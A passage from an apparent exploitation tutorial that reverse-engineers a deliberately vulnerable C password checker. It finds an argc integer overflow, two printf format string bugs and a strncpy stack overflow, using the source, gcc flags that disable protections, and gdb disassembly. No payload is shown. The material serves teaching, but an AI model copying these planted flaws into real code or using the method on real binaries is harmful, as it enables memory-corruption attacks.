class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"**/spanspan class="n"argv/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"2/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot; lt;passwordgt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Wrong password: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"putchar/spanspan class="p"(/spanspan class="n"c/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pHere is the quick demonstration:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/home/testuser# /spangcc -z execstack -fno-stack-protector -o app-intof app-intof.c /span span class="code-line"span class="gp"[email protected]:/home/testuser# ./app-intof $/spanspan class="o"(/spanpython -c span class="s1"#39;print quot;A quot;*126#39;/spanspan class="o")/span/span span class="code-line"span class="go"Wrong password: A/span/span span class="code-line"span class="gp"[email protected]:/home/testuser# ./app-intof $/spanspan class="o"(/spanpython -c span class="s1"#39;print quot;A quot;*127#39;/spanspan class="o")/span/span span class="code-line"span class="go"Usage: ./app-intof lt;passwordgt;/span/span span class="code-line"/code/pre/div /td/tr/table pWhat is happening here is that the argument codeargc/code is being interpreted as a signed char and the max value for this type of variable is 127:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/home/testuser# /spangrep SCHAR_MAX /usr/include/limits.h /span span class="code-line"span class="gp"# /spandefine SCHAR_MAX span class="m"127/span/span span class="code-line"span class="gp"# /spandefine CHAR_MAX SCHAR_MAX/span span class="code-line"/code/pre/div /td/tr/table pAs the application is the first argument, we can have another 126 argument before the variable overflows and becomes -128, which is obviously smaller than 2./p h2Back To The Juicy Bits/h2 pSo now we know how to get to the code we want to analyse, which is:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x08048627 lt;+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 0x0804862a lt;+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="x" 0x0804862c lt;+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x0804862f lt;+35gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"/code/pre/div /td/tr/table pLet's set a breakpoint on line 1 here (or code0x08048627/code) and run the application without any arguments./p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x08048627/span/span span class="code-line"span class="go"Breakpoint 1 at 0x8048627/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/testuser/app /span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 1, 0x08048627 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble $eip,+10/span/span span class="code-line"span class="go"Dump of assembler code from 0x8048627 to 0x8048631:/span/span span class="code-line"span class="go"=gt; 0x08048627 lt;main+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804862a lt;main+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804862c lt;main+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804862f lt;main+35gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/xw $ebp+0xc/span/span span class="code-line"span class="go"0xbfc674f4: 0xbfc67594/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/xw 0xbfc67594/span/span span class="code-line"span class="go"0xbfc67594: 0xbfc6795f/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0xbfc6795f/span/span span class="code-line"span class="go"0xbfc6795f: quot;/home/testuser/appquot;/span/span span class="code-line"/code/pre/div /td/tr/table pThis shows that our assumptions were correct and that there is likely a format string vulnerability here which we can exploit by chaning the name of the application (or creating a symlink as in a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"part 2/a./p pWe also have a very similar set of codeprintf/code calls towards the end of the application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x08048667 lt;+91gt;: mov DWORD PTR [esp],0x8048804/span/span span class="code-line"span class="x" 0x0804866e lt;+98gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="x" 0x08048673 lt;+103gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 0x08048676 lt;+106gt;: add eax,0x4/span/span span class="code-line"span class="x" 0x08048679 lt;+109gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="x" 0x0804867b lt;+111gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x0804867e lt;+114gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"/code/pre/div /td/tr/table pWe are interested in the second codeprintf/code here but to figure out how to get to it we need to have a look at the memory at code0x8048804/code which is printed just before./p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0x8048804/span/span span class="code-line"span class="go"0x8048804: quot;Wrong password: quot;/span/span span class="code-line"/code/pre/div /td/tr/table pSo we get to this section of code when we give a wrong password. The call to the codeprintf/code in question is the same as previous except 4 is added to EAX before the pointer is followed. This suggests the second argument is being printed (also the previous codeprintf/code supports our theory), but let's check./p pLet's set a breakpoint and examine the memory again:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"info breakpoints/span/span span class="code-line"span class="go"Num Type Disp Enb Address What/span/span span class="code-line"span class="go"1 breakpoint keep y 0x08048627 lt;main+27gt;/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"delete 1/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x0804867b/span/span span class="code-line"span class="go"Breakpoint 2 at 0x804867b/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r ABC/span/span span class="code-line"span class="go"Starting program: /home/testuser/app ABC/span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 2, 0x0804867b in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s $eax/span/span span class="code-line"span class="go"0xbffff96d: quot;ABCquot;/span/span span class="code-line"/code/pre/div /td/tr/table pThis is the second format string vulnerability./p h2Buffer Overflow/h2 pSo far we have found an integer overflow and 2 format string vulnerabilities./p pNext we should look over the codecheckpass/code function which is called on line 23 of the disassembly above. Here is the relevant instructions related to the call to codecheckpass/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x0804864c lt;+64gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 0x0804864f lt;+67gt;: add eax,0x4/span/span span class="code-line"span class="x" 0x08048652 lt;+70gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="x" 0x08048654 lt;+72gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x08048657 lt;+75gt;: call 0x80486a2 lt;checkpassgt;/span/span span class="code-line"/code/pre/div /td/tr/table pWe've already seen a set of instructions that were exactly the same as this, the second call to codeprintf/code, so this function takes 1 argument, the second argument to the application./p pHere is the disassembly of codecheckpass/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble checkpass/span/span span class="code-line"span class="go"Dump of assembler code for function checkpass:/span/span span class="code-line"span class="go" 0x080486a2 lt;+0gt;: push ebp/span/span span class="code-line"span class="go" 0x080486a3 lt;+1gt;: mov ebp,esp/span/span span class="code-line"span class="go" 0x080486a5 lt;+3gt;: sub esp,0x228/span/span span class="code-line"span class="go" 0x080486ab lt;+9gt;: mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="go" 0x080486ae lt;+12gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x080486b1 lt;+15gt;: call 0x80484d0 lt;[email protected];/span/span span class="code-line"span class="go" 0x080486b6 lt;+20gt;: add eax,0x1/span/span span class="code-line"span class="go" 0x080486b9 lt;+23gt;: mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="go" 0x080486bd lt;+27gt;: mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="go" 0x080486c0 lt;+30gt;: mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="go" 0x080486c4 lt;+34gt;: lea eax,[ebp-0x20c]/span/span span class="code-line"span class="go" 0x080486ca lt;+40gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x080486cd lt;+43gt;: call 0x8048510 lt;[email protected];/span/span span class="code-line"span class="go" 0x080486d2 lt;+48gt;: mov DWORD PTR [esp+0x4],0x8048815/span/span span class="code-line"span class="go" 0x080486da lt;+56gt;: lea eax,[ebp-0x20c]/span/span span class="code-line"span class="go" 0x080486e0 lt;+62gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x080486e3 lt;+65gt;: call 0x8048460 lt;[email protected];/span/span span class="code-line"span class="go" 0x080486e8 lt;+70gt;: mov DWORD PTR [ebp-0xc],eax/span/span span class="code-line"span class="go" 0x080486eb lt;+73gt;: mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="go" 0x080486ee lt;+76gt;: leave /span/span span class="code-line"span class="go" 0x080486ef lt;+77gt;: ret /span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pIn the prologue, 0x228 bytes (or 552 bytes) are reserved for local variables and function call arguments./p pThe interesting call here is the call to codestrncpy/code but we need to examine the call to codestrlen/code first because it looks like output is the third argument to codestrncpy/code./p pThe call to codestrlen/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="